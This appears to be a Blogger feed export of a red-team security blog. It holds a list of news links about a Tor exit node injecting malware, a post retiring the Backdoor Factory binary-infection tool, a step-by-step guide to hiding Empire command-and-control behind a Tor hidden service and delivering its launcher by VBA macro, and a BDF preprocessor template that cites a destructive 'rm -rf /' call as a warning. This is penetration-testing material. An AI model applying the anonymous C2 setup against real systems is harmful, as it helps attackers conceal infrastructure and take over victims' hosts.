tag:blogger.com,1999:blog-16588794375506435982024-03-15T18:10:08.021-07:00Secure All The Thingsmidnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.comBlogger11125tag:blogger.com,1999:blog-1658879437550643598.post-42217422464511201952017-08-10T09:14:00.000-07:002017-08-10T09:14:51.429-07:00In News Archive<br />
<br />
<b>Tor Russia MITM Malware Injection:</b><br />
<br />
<a href="http://threatpost.com/researcher-finds-tor-exit-node-adding-malware-to-binaries/109008" target="_blank">http://threatpost.com/researcher-finds-tor-exit-node-adding-malware-to-binaries/109008</a><br />
<br />
<a href="http://www.theregister.co.uk/2014/10/27/tor_exit_node_mashes_malware_into_downloads/" target="_blank">http://www.theregister.co.uk/2014/10/27/tor_exit_node_mashes_malware_into_downloads/</a><br />
<br />
<a href="http://www.infoworld.com/article/2839135/security/tor-project-flags-russian-exit-node-server-delivering-malware.html" target="_blank">http://www.infoworld.com/article/2839135/security/tor-project-flags-russian-exit-node-server-delivering-malware.html</a><br />
<br />
<a href="http://www.zdnet.com/rogue-tor-node-wraps-executables-with-malware-7000035060/" target="_blank">http://www.zdnet.com/rogue-tor-node-wraps-executables-with-malware-7000035060/</a><br />
<br />
<a href="http://www.itworld.com/article/2838975/tor-project-flags-russian-exit-node-server-for-delivering-malware.html" target="_blank">http://www.itworld.com/article/2838975/tor-project-flags-russian-exit-node-server-for-delivering-malware.html</a><br />
<br />
<a href="http://www.net-security.org/malware_news.php?id=2897" target="_blank">http://www.net-security.org/malware_news.php?id=2897</a><br />
<br />
<a href="http://www.scmagazineuk.com/rogue-tor-exit-node-injects-malware-into-downloaded-binaries/article/379404/" target="_blank">http://www.scmagazineuk.com/rogue-tor-exit-node-injects-malware-into-downloaded-binaries/article/379404/</a><br />
<br />
<a href="http://www.scmagazine.com/tor-exit-node-found-to-add-malware-to-downloaded-binaries/article/379526/">http://www.scmagazine.com/tor-exit-node-found-to-add-malware-to-downloaded-binaries/article/379526/</a><br />
<br />
<a href="http://www.theguardian.com/technology/2014/oct/28/tor-users-advised-check-computers-malware">http://www.theguardian.com/technology/2014/oct/28/tor-users-advised-check-computers-malware</a><br />
<br />
<a href="http://www.darkreading.com/attacks-breaches/researcher-shows-why-tor-anonymity-is-no-guarantee-of-security/d/d-id/1316994" target="_blank">http://www.darkreading.com/attacks-breaches/researcher-shows-why-tor-anonymity-is-no-guarantee-of-security/d/d-id/1316994</a><br />
<br />
<a href="http://www.computerworld.com/article/2838788/tor-project-flags-russian-exit-node-server-for-delivering-malware.html" target="_blank">http://www.computerworld.com/article/2838788/tor-project-flags-russian-exit-node-server-for-delivering-malware.html</a><br />
<div>
<br /></div>
<a href="https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-october-29th-2014" target="_blank">https://blog.torproject.org/blog/tor-weekly-news-%E2%80%94-october-29th-2014</a><br />
<br />
<br />
<b>OnionDuke Reversing:</b><br />
<br />
<a href="https://www.forbes.com/sites/thomasbrewster/2015/07/23/plagiarizing-malware/#4fb7a1cb59e3" target="_blank">https://www.forbes.com/sites/thomasbrewster/2015/07/23/plagiarizing-malware/#4fb7a1cb59e3</a><br />
<br />
<b>Apple:</b><br />
<a href="https://www.forbes.com/sites/thomasbrewster/2016/01/15/apple-mac-gatekeeper-fails-again/#35e82ee07ea5" target="_blank">https://www.forbes.com/sites/thomasbrewster/2016/01/15/apple-mac-gatekeeper-fails-again/#35e82ee07ea5</a>midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.comtag:blogger.com,1999:blog-1658879437550643598.post-64747536655331424022017-08-02T12:02:00.001-07:002020-07-14T17:33:08.241-07:00RE: Closing the Door | End of Backdoor FactoryUPDATE 7/14/2020:<div>Development of a new version is in the works, help me make it happen:
<iframe src="https://github.com/sponsors/secretsquirrel/card" title="Sponsor secretsquirrel" height="225" width="600" style="border: 0;"></iframe>
</div><div><br /></div><div><h1 class="quoteText" style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; font-weight: normal; line-height: 21px; margin: 0px 0px 15px; orphans: 2; padding: 0px; widows: 2;">“The time has come," the walrus said, "to talk of many things: Of shoes and ships - and sealing wax - of cabbages and kings”</h1>
<span style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;">―</span><span style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;"> </span><a class="authorOrTitle" data-ss1501688001="1" href="https://www.goodreads.com/author/show/8164.Lewis_Carroll" style="background-color: white; color: #333333; font-family: lato, "helvetica neue", helvetica, sans-serif; font-size: 14px; font-weight: bold; orphans: 2; text-decoration: none; widows: 2;">Lewis Carroll</a><span style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;">,</span><span style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;"> </span><span id="quote_book_link_24213" style="background-color: white; color: #181818; font-family: merriweather, georgia, serif; font-size: 14px; orphans: 2; widows: 2;">Alice's Adventures in Wonderland & Through the Looking-Glass</span><br />
<br />
<div style="text-align: center;">
===</div>
<br />
I've been thinking about ending Backdoor Factory (BDF), including BDFProxy, support for a couple months. The idea has crept up more and more as my attention is often pulled in more interesting directions.<br />
<br />
Writing and maintaining BDF (since 2013) has been fun but it is time to move on to other things. The code will stay up, but I won't be adding anymore features or maintaining any code.<br />
<br />
I originally wrote BDF to automate the manual process of file infection with PE files. To show that Anti-Virus (AV) is easy to bypass (it still is) and that file infectors still have a place in offensive use cases. I added ELF and Macho binaries and x86 and 64 bit support, code signing, etc... It was fast. So fast I created BDFProxy which lead me to finding <a href="http://www.leviathansecurity.com/blog/the-case-of-the-modified-binaries" target="_blank">OnionDuke</a>.<br />
<br />
BDF was fairly popular, averaging about 1500 unique clones every two weeks for the past couple years just from my git repo. It was added into Kali and other distributions. I have used it in demos at many presentations: two DerbyCon presentations (<a href="https://www.youtube.com/watch?v=jXLb2RNX5xs" target="_blank">1</a>, <a href="https://www.youtube.com/watch?v=LjUN9MACaTs" target="_blank">2</a>), ShmooCon <a href="https://archive.org/details/joshpitts_shmoocon2015" target="_blank">2015</a>, Black Hat <a href="https://www.youtube.com/watch?v=OuyLzkG16Uk" target="_blank">2015</a>, Infiltrate <a href="https://vimeo.com/181069184" target="_blank">2016</a>, Eko Party <a href="https://www.youtube.com/watch?v=WI8Y24jTTlw" target="_blank">2016</a>, REcon Brussels 2016, and DEF CON 25.<br />
<br />
It wasn't until July 2015 where an AV finally flagged one of my IAT custom payloads. Since then, more AVs have written their own detections - I know how each one is detecting and how to bypass them. That's how fragile AV signatures are. I could update BDF and add features to bypass their detections, wait another six months to a year for new detections to come out, and bypass again. Rinse and repeat. It's like a bug bounty where only AVs win and I lose my time.<br />
<br />
There really is no incentive for me to continue that cycle. At least publicly.<br />
<br />
I've considered making a professional version of BDF and that path looks quite dangerous and not very profitable. I think if someone were to do that, the risk of legal entrapment is high. Whereas one could accidentally provide customer support to someone doing illegal things and be caught up in their actions when they are eventually caught by law enforcement. Let's face it, if someone is paying for a cheap file infector (something that is easy to write yourself), they aren't very bright.<br />
<br />
It's time to move on to more interesting ideas and harder problems.<br />
<div>
<br /></div>
Thanks for the kind words and support over the years, it's been a hell of a ride.<br />
<div>
<br /></div>
<br /></div>midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com2tag:blogger.com,1999:blog-1658879437550643598.post-64982633756305479392016-11-26T21:29:00.000-08:002017-12-24T09:39:31.442-08:00Use Tor. Use Empire.<div style="-webkit-text-stroke-color: rgb(4, 46, 238); -webkit-text-stroke-width: initial; color: #042eee; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none; text-decoration: underline;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Recently I used <a href="https://github.com/adaptivethreat/Empire"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #551a8b;">Empire</span></a> at work on a phishing engagement because it supports macOS, Linux, and Windows hosts from one listener. You should try it out if you find yourself where you need Command and Control (C2) that is easy to use with many features.*</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">But that is not the topic of this post.</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Many security experts say: "Use Tor. Use Signal." And I can agree on that to some extent. However, ordering food over Tor is difficult when the waiter is looking at you in the face. I guess context is everything. </span><span style="font-family: "helvetica"; font-size: 14px; line-height: normal;">¯\_(ツ)_/¯</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">I say "Use Tor. Use Empire." /snark</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">It's not difficult and using Empire through a hidden service solves some problems:</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>You don't need a server on the Internet - put the C2 in a docker host locally or put it behind <a href="https://github.com/grugq/portal"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #551a8b;">portal</span></a></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Keep your C2 anonymous - only the Empire Listener is exposed</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Doesn't require Tor to be installed on the host/target (<a href="https://github.com/globaleaks/Tor2web/wiki"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #042eee;">tor2web</span></a>)</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Secure by default (more on this)</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">On the downside:</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>My Demo uses tor2web URLs - pretty easy to filter for a defender</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Not using tor2web type redirectors requires Tor to be installed on the host and then proxied via the tor socks listener via netcat (Mac/*nix) - on windows it's a bit more difficult (netsh and bypass-filter all the things)</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>There have been <a href="https://people.csail.mit.edu/devadas/pubs/circuit_finger.pdf"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #042eee;">attacks</span></a> to de-anonymize tor hidden services (certain conditions apply).</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Here's how to do it:<br />
</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Install Tor on your server where you will be using Empire.</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Update the torrc to support the hidden service with the following syntax: HiddenServicePort 80 127.0.01:<listener port></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeTWObiNN_4WdSFAxZKqAuDp6EMdP37hXfzRRYW241RLj0uwGWSCTJ5jYmUPOM-Gd2R5Xovg-3ft936AzQDqkZxkHj_rc3f1ptWKf1f-xz7uryo3676qolS2uJukqgsjARIo_F4u_zjjE/s1600/hidden.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeTWObiNN_4WdSFAxZKqAuDp6EMdP37hXfzRRYW241RLj0uwGWSCTJ5jYmUPOM-Gd2R5Xovg-3ft936AzQDqkZxkHj_rc3f1ptWKf1f-xz7uryo3676qolS2uJukqgsjARIo_F4u_zjjE/s640/hidden.png" width="640" /></a></div>
<span style="font-kerning: none;"><br /></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Grab your hidden service hostname in the above directory:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihRmlEuUpMrPVGxkQKKIzsJ3jiNFEa6_dt_krcnBW8BeuCcgfRdLX6sRRFjWRnkHNMUq_RvuAdMTMhmPUdwGa_bNnnzzCD7m0_N5FF5sMFCPWocVeho5EKdSVpSHbE6uvlb1nuTlnDtag/s1600/hostname.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihRmlEuUpMrPVGxkQKKIzsJ3jiNFEa6_dt_krcnBW8BeuCcgfRdLX6sRRFjWRnkHNMUq_RvuAdMTMhmPUdwGa_bNnnzzCD7m0_N5FF5sMFCPWocVeho5EKdSVpSHbE6uvlb1nuTlnDtag/s640/hostname.png" width="640" /></a></div>
<span style="font-kerning: none;"><br /></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Set up your listener. In the screenshot below I'm using .onion.to as the domain. It's typed correctly: https://y4hgaofmhx3bcml4.onion.to<b>/:</b>9090 Note the /:<PORT> after the onion.to -that's the correct syntax. I set the DefaultDelay and Jitter at higher intervals because Tor can be slow at times.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFZC_Ekgfd3hPTJlNTxxDnPxz8gSmKKh5T9KKFIdkMpVrBxDXze1baTf65qagkegjiEtlLURt10ML1frnRGb-O1y9DpmHPH-O4dH8Q6clFltxUiXb8mYsmhhx3ojZ8_O_te81ZE5yH7hk/s1600/info_listener.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFZC_Ekgfd3hPTJlNTxxDnPxz8gSmKKh5T9KKFIdkMpVrBxDXze1baTf65qagkegjiEtlLURt10ML1frnRGb-O1y9DpmHPH-O4dH8Q6clFltxUiXb8mYsmhhx3ojZ8_O_te81ZE5yH7hk/s640/info_listener.png" width="640" /></a></div>
<span style="font-kerning: none;"><br /></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Now grab the launcher to deploy in your VBA macro, <a href="https://github.com/Genetic-Malware/Ebowla"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #551a8b;">Ebowla</span></a>, or via manual means:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin46NUqcuEVNokanZ2k1U2mFSoawybrSzqIXLKuZiJMR_gSKe1sepxnCEq_IguyroyXEGw6sSZ2OXTyuTfiKmk-VsHVBEzzrJfkP_7O8Cg1qd6LGhhPYLDVuPXDZbQP2eW7PtxB9E4TqY/s1600/launcher.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin46NUqcuEVNokanZ2k1U2mFSoawybrSzqIXLKuZiJMR_gSKe1sepxnCEq_IguyroyXEGw6sSZ2OXTyuTfiKmk-VsHVBEzzrJfkP_7O8Cg1qd6LGhhPYLDVuPXDZbQP2eW7PtxB9E4TqY/s640/launcher.png" width="640" /></a></div>
<span style="font-kerning: none;"><br /></span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>After deployment, you should see this shortly:</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwHsQ8ry8k7TIKIlW_rDNPBi7mnXXKLBU0VGqRsTxVsbUO-s7iTBw2ReaGBh9Pb4QMQdBRH4di3GR6C7c-AEML-UTSk62y3sVuOipEM6JzE9nOi_Eq-X9MRz64YZQuZ2sUo_mpAIS9cWg/s1600/connection_back.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwHsQ8ry8k7TIKIlW_rDNPBi7mnXXKLBU0VGqRsTxVsbUO-s7iTBw2ReaGBh9Pb4QMQdBRH4di3GR6C7c-AEML-UTSk62y3sVuOipEM6JzE9nOi_Eq-X9MRz64YZQuZ2sUo_mpAIS9cWg/s640/connection_back.png" width="640" /></a></div>
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Notice in the config that I didn't use a cert to force HTTPS agent communications. A couple reasons:</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>The Tor2Web site in this demo uses TLS 1.2 AES-256-GCM with ECDHE_RSA for key exchange.</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Traffic from the Tor2Web URL redirector is encrypted via the <a href="https://www.torproject.org/docs/hidden-services.html.en"><span style="-webkit-font-kerning: none; -webkit-text-stroke-color: rgb(4, 46, 238); color: #042eee;">normal tor encryption method all the way to the hidden service</span></a>.</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; margin-left: 36px; text-indent: -36px;">
<span style="font-kerning: none;"><span class="Apple-tab-span" style="white-space: pre;"> </span>•<span class="Apple-tab-span" style="white-space: pre;"> </span>Using a cert to force https in my testing resulted in failure. </span><span style="font-family: "helvetica"; font-size: 14px; line-height: normal;">ಠ_ಠ</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">Ok that's it, enjoy your shells responsibly!</span></div>
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal; min-height: 19px;">
<span style="font-kerning: none;"></span><br /></div>
<a href="https://www.blogger.com/blogger.g?blogID=1658879437550643598" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1658879437550643598" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1658879437550643598" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1658879437550643598" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1658879437550643598" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1658879437550643598" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1658879437550643598" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;">
</a><br />
<div style="-webkit-text-stroke-color: rgb(0, 0, 0); -webkit-text-stroke-width: initial; font-family: Times; font-size: 16px; line-height: normal;">
<span style="font-kerning: none;">* Metasploit would have worked also, just wanted to give Empire a shot.</span></div>
midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com2tag:blogger.com,1999:blog-1658879437550643598.post-71718345685648803212016-06-20T20:11:00.000-07:002016-06-20T20:43:05.626-07:00BDF Preprocessor and Going ForwardI've been giving some thought over the past couple months where to take the Backdoor Factory (BDF). And I've decided to do a couple things:<br />
<ul>
<li>Make it easier to understand the internals</li>
<li>Make it more modular - drop-in scripts, patching methods, and payloads</li>
<li>Update it to python2/3 compatibility</li>
</ul>
<div>
These three things will allow for future portability within the python world and allow people to write their own plugins, patching methods, and extend functionality. Yes I want to implement drop-in code injection/patching methods. It will happen, I just need to re-write some of the core BDF code.</div>
<div>
<br /></div>
<div>
So starting with this post I'll be explaining the preprocessor addition, added in version 3.4.0, in a first attempt to extend functionality. Preprocessor scripts are just that - python code to do X. Whatever X is. I've included a couple examples in this release, in the preprocessor directory, to help explain what you can do and there will be more examples in the future. The main reason I came up with the preprocessor was that I was tired of modifying core BDF code to test an idea or concept. With preprocessor you can write whatever you want without mucking up the main code... well unless you muck up the main code in your script. And that is correct, there are no safety checks in the script loader. If you want to write os.system('rf -rf /") in your script YOU CAN! So be careful running third party preprocessor scripts.</div>
<div>
<div>
<br /></div>
</div>
<div>
Preprocessor Rules:</div>
<div>
<ul>
<li>The preprocessor functionality is enabled by the "-p" flag in BDF.</li>
<li>They run in alphabetical order.</li>
<li>Your script must be in the preprocessor directory.</li>
<li>One tempfile is created for all preprocessor scripts and is passed from one script to the next before being passed to BDF for payload injection. The modifications to the tempfile, before payload injection, can be saved for inspection and troubleshooting.</li>
</ul>
</div>
<div>
How to write your own preprocessor script? I've included a blank template in preprocessor:</div>
<div>
./preprocessor/template.py</div>
<div>
<br /></div>
<div>
Just copy that script to a new one. Afterwards open the file for editing.</div>
<div>
<br /></div>
<div>
You'll notice the settings section with four options:</div>
<div>
<ul>
<li>enabled (True or False)- If you want this preprocessor script executed when the preprocessor is invoked</li>
<li>keep_temp (True or False) - This saves the tempfile as it is before payload injection</li>
<li>recheck_support (True or False) - This pushes the tempfile through the support check function to ensure changes, if any, did not break patching candidacy. </li>
<li>file_format (PE, ELF, Macho, or ALL)- This sets what file format your script applies to. </li>
</ul>
<div>
After that you have the preprocessor script itself:</div>
</div>
<div>
<br /></div>
<div>
# <span style="font-family: "menlo"; font-size: 11px;">REQUIRED</span></div>
<div>
<span style="font-family: "menlo"; font-size: 11px;">class preprocessor:</span></div>
<br />
<div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"></span><br /></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # REQUIRED</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> def __init__(self, BDF):</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # REQUIRED</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> self.BDF = BDF</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # if you want to return a result set it to True</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # and check for failures</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> self.result = True</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"></span><br /></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # REQUIRED</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> def run(self):</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # call your program main here</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> self.hello()</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
